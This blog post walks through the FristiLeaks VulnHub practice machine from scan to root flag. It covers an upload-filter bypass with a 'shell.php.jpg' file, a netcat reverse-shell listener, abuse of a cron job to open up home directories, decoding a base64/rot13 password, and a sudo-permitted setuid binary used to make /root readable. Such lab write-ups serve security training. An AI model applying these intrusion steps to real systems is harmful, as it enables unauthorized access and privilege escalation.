FristiLeaks
This is my second box I have on my list to work through. As I mentioned earlier, these list is comprised of old boxes, but still can form a good challenge to work up to OSCP.
Recon
Starting with a nmap scan to find out which ports are open and what public facing services are running on the system.
|
1 2 3 4 5 6 7 8 9 10 |
[crayon-6005e6780ba4a097250766 inline="true" ]PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3) | http-methods: | Supported Methods: GET HEAD POST OPTIONS TRACE |_ Potentially risky methods: TRACE | http-robots.txt: 3 disallowed entries |_/cola /sisi /beer |_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC) |
[/crayon]
Port 80 with a webserver running behind it. The version of the webserver is Apache 2.2.15.
Nmap has guessed that the OS is CentOS.
There are some entries in the robots.txt file, but before I investigate the website, I’m going to check the known vulnerabilities of the Apache version.
|
1 2 3 4 5 6 7 8 9 |
[crayon-6005e6780ba52764163717 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # searchsploit apache 2.2.15 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result |
[/crayon]
Webserver
The main page of the website has some names of the hackers behind Fristileaks and in the source there is a comment:
|
1 2 3 4 5 |
[crayon-6005e6780ba56817474278 inline="true" ]<!-- Welcome to #Fristleaks, a quick hackme VM by @Ar0xA Goal: get UID 0 (root) and read the special flag file. Timeframe: should be doable in 4 hours. --> |
[/crayon]
The 3 entries in the
robots.txt file all point to the same picture, which looks like a red haring. Just to be sure I check the pic for meta data or other hidden data, but I can’t find anything.
Time to run dirSearch and bruteforce the website in hope of finding more files/folders.
Nothing……very frustrating. I tried different worklists, but all come back with the same results. Only the 3 drinks. I really cracked my head, it dawned on me that the 3 drinks were a hint and the main page was the answer. There was one drink that wasn’t in any of my lists, mostly because it is a particular Dutch drink……fristi
The result was a admin portal with some comments.
|
1 2 3 4 5 6 7 |
[crayon-6005e6780ba5c130641403 inline="true" ]<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it."> <!-- TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz --> |
[/crayon]
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
[crayon-6005e6780ba60256331622 inline="true" ]<!-- iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR U5ErkJggg== --> |
[/crayon]
There are several ways to decode this base64 comment. As it is an encoded PNG file, I just replace the initial picture on the site with this piece of code. The result is a picture with a string of letters:
keKkeKKeKKeKkEkkEk
A password? But what about the username? In the comment above there is name:
eezeepz
This username combined with the password gives me access to a page with an upload posibility.
Will it let me upload anything?
|
1 2 |
[crayon-6005e6780ba67467080050 inline="true" ]Sorry, is not a valid file. Only allowed are: png,jpg,gif Sorry, file not uploaded |
[/crayon]
So it won’t let me upload a php file. Will it let me upload a file with the extention
php.jpg?
|
1 2 |
[crayon-6005e6780ba6c617095531 inline="true" ]Uploading, please wait The file has been uploaded to /uploads |
[/crayon]
Yes, it will. Now to start up a listener and run the file from the browser.
|
1 2 3 |
[crayon-6005e6780ba6f753278825 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # nc -lvnp 9999 listening on [any] 9999 ... |
[/crayon]
The file can be found in
/fristi/uploads/shell.php.jpg
|
1 2 3 4 5 6 7 8 9 10 |
[crayon-6005e6780ba74353354884 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # nc -lvnp 9999 listening on [any] 9999 ... connect to [192.168.50.130] from (UNKNOWN) [192.168.50.134] 47595 Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 17:17:45 up 1:05, 0 users, load average: 0.00, 0.01, 0.20 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) sh: no job control in this shell sh-4.1$ |
[/crayon]
A good place to start is the www folder and look for things I’ve missed.
|
1 2 3 4 5 6 7 8 9 10 11 12 |
[crayon-6005e6780ba78643137756 inline="true" ]sh-4.1$ cd /var/www cd /var/www sh-4.1$ ls -lah ls -lah total 28K drwxr-xr-x. 6 root root 4.0K Nov 17 2015 . drwxr-xr-x. 19 root root 4.0K Nov 19 2015 .. drwxr-xr-x. 2 root root 4.0K Aug 24 2015 cgi-bin drwxr-xr-x. 3 root root 4.0K Nov 17 2015 error drwxr-xr-x. 7 root root 4.0K Nov 25 2015 html drwxr-xr-x. 3 root root 4.0K Nov 17 2015 icons -rw-r--r-- 1 root root 98 Nov 17 2015 notes.txt |
[/crayon]
A file called
notes.txt
|
1 2 3 4 5 6 |
[crayon-6005e6780ba7d264577190 inline="true" ]sh-4.1$ cat notes.txt cat notes.txt hey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff. -jerry |
[/crayon]
In the home directory of user
eezeepz is a note:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
[crayon-6005e6780ba82791990674 inline="true" ]sh-4.1$ cat /home/eezeepz/notes.txt cat /home/eezeepz/notes.txt Yo EZ, I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/ Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges. - Jerry |
[/crayon]
Ok, so I can try and use chmod to let me read more home folders. An important note is the piece of info in the note, that it is required to use the full path. So in this case I try
/usr/bin/chmod
|
1 2 |
[crayon-6005e6780ba92633104053 inline="true" ]sh-4.1$ echo "/usr/bin/chmod -R 777 /home/" > runthis echo "/home/admin/chmod -R 777 /home/" > runthis |
[/crayon]
After a minute I check
/home and it seems like it worked.
|
1 2 3 4 5 6 7 8 |
[crayon-6005e6780ba98301617406 inline="true" ]sh-4.1$ ls -lah /home ls -lah /home total 28K drwxr-xr-x. 5 root root 4.0K Nov 19 2015 . dr-xr-xr-x. 22 root root 4.0K May 27 16:11 .. drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 admin drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod |
[/crayon]
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
[crayon-6005e6780ba9b816428202 inline="true" ]sh-4.1$ ls -lah ls -lah total 652K drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 . drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .. -rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout -rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile -rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc -rwxrwxrwx 1 admin admin 45K Nov 18 2015 cat -rwxrwxrwx 1 admin admin 48K Nov 18 2015 chmod -rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py -rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt -rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py -rwxrwxrwx 1 admin admin 89K Nov 18 2015 df -rwxrwxrwx 1 admin admin 24K Nov 18 2015 echo -rwxrwxrwx 1 admin admin 160K Nov 18 2015 egrep -rwxrwxrwx 1 admin admin 160K Nov 18 2015 grep -rwxrwxrwx 1 admin admin 84K Nov 18 2015 ps -rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt |
[/crayon]
A few python scripts and textfiles. Let’s look at the text file from fristigod.
|
1 2 3 |
[crayon-6005e6780ba9f280474961 inline="true" ]sh-4.1$ cat whoisyourgodnow.txt cat whoisyourgodnow.txt =RFn0AKnlMHMPIzpyuTI0ITG |
[/crayon]
Hmmm. What about the other text file.
|
1 2 3 |
[crayon-6005e6780baa2184946262 inline="true" ]sh-4.1$ cat cryptedpass.txt cat cryptedpass.txt mVGZ3O3omkJLmy2pcuTq |
[/crayon]
It isn’t base64. So let’s take a look at the python scripts.
|
1 2 3 4 5 6 7 8 9 |
[crayon-6005e6780baa9794250309 inline="true" ]#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn import base64,codecs,sys def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13') cryptoResult=encodeString(sys.argv[1]) print cryptoResult |
[/crayon]
It starts with a strings, encode base64, reverses the string and finally rot13 encoding.
To make it readible again, I need to reverse this script. For this I can use a bash oneliner.
|
1 2 3 |
[crayon-6005e6780baac823553715 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # echo mVGZ3O3omkJLmy2pcuTq | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d thisisalsopw123 |
[/crayon]
|
1 2 3 |
[crayon-6005e6780baaf321783359 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # echo =RFn0AKnlMHMPIzpyuTI0ITG | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d LetThereBeFristi! |
[/crayon]
Ok. Let’s see if this is a password.
|
1 2 3 4 5 6 7 8 9 |
[crayon-6005e6780bab3706669616 inline="true" ]sh-4.1$ python -c 'import pty;pty.spawn("/bin/sh");' python -c 'import pty;pty.spawn("/bin/sh");' sh-4.1$ su fristigod su fristigod Password: LetThereBeFristi! bash-4.1$ id id uid=502(fristigod) gid=502(fristigod) groups=502(fristigod) |
[/crayon]
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
[crayon-6005e6780bab6087158660 inline="true" ]bash-4.1$ cd /home cd /home bash-4.1$ ls ls admin eezeepz fristigod bash-4.1$ cd fristigod cd fristigod bash-4.1$ ls -lah ls -lah total 20K drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 . drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .. -rw-r--r-- 1 fristigod fristigod 18 Sep 22 2015 .bash_logout -rw-r--r-- 1 fristigod fristigod 176 Sep 22 2015 .bash_profile -rw-r--r-- 1 fristigod fristigod 124 Sep 22 2015 .bashrc |
[/crayon]
Nothing….but as we could see in
/etc/passwd the home folder was located in
/var/fristigod.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
[crayon-6005e6780babd664696947 inline="true" ]bash-4.1$ cd /var/fristigod cd /var/fristigod bash-4.1$ ls -lah ls -lah total 16K drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 . drwxr-xr-x. 19 root root 4.0K Nov 19 2015 .. -rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff bash-4.1$ cd .secret_admin_stuff cd .secret_admin_stuff bash-4.1$ ls -lah ls -lah total 16K drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 . drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 .. -rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom bash-4.1$ file doCom file doCom doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped |
[/crayon]
An ELF file with the SGID/SUID bit set.
|
1 2 3 |
[crayon-6005e6780bac0130977176 inline="true" ]bash-4.1$ ./doCom ./doCom Nice try, but wrong user ;) |
[/crayon]
Hahaha….bummer.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
[crayon-6005e6780bac4314895654 inline="true" ]bash-4.1$ sudo -l sudo -l [sudo] password for fristigod: LetThereBeFristi! Matching Defaults entries for fristigod on this host: requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User fristigod may run the following commands on this host: (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom |
[/crayon]
|
1 2 3 |
[crayon-6005e6780baca457773964 inline="true" ]bash-4.1$ sudo -u fristi ./doCom sudo -u fristi ./doCom Usage: ./program_name terminal_command ... |
[/crayon]
So I can run the file as fristi.
|
1 2 3 4 5 6 7 8 9 10 |
[crayon-6005e6780bace978902045 inline="true" ]bash-4.1$ sudo -u fristi ./doCom touch /var/fristigod/test.tmp sudo -u fristi ./doCom touch /var/fristigod/test.tmp bash-4.1$ ls -lah /var/fristigod ls -lah /var/fristigod total 16K drwxr-x--- 3 fristigod fristigod 4.0K May 27 18:31 . drwxr-xr-x. 19 root root 4.0K Nov 19 2015 .. -rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff -rw-r--r-- 1 root users 0 May 27 18:31 test.tmp |
[/crayon]
Nice.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
[crayon-6005e6780bad1666700564 inline="true" ]bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root sudo -u fristi ./doCom chmod -R 777 /root bash-4.1$ ls -lah /root ls -lah /root total 48K drwxrwxrwx. 3 root root 4.0K Nov 25 2015 . dr-xr-xr-x. 22 root root 4.0K May 27 16:11 .. -rwxrwxrwx 1 root root 1.9K Nov 25 2015 .bash_history -rwxrwxrwx. 1 root root 18 May 20 2009 .bash_logout -rwxrwxrwx. 1 root root 176 May 20 2009 .bash_profile -rwxrwxrwx. 1 root root 176 Sep 22 2004 .bashrc drwxrwxrwx. 3 root root 4.0K Nov 25 2015 .c -rwxrwxrwx. 1 root root 100 Sep 22 2004 .cshrc -rwxrwxrwx. 1 root root 1.3K Nov 17 2015 .mysql_history -rwxrwxrwx. 1 root root 129 Dec 3 2004 .tcshrc -rwxrwxrwx. 1 root root 829 Nov 17 2015 .viminfo -rwxrwxrwx. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt |
[/crayon]
|
1 2 3 4 5 6 7 8 9 |
[crayon-6005e6780bad5930154408 inline="true" ]bash-4.1$ cat /root/fristileaks_secrets.txt cat /root/fristileaks_secrets.txt Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu] I wonder if you beat it in the maximum 4 hours it's supposed to take! Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode) Flag: Y0u_kn0w_y0u_l0ve_fr1st1 |
[/crayon]
And that was the challenge. Not to difficult and really a good one to try.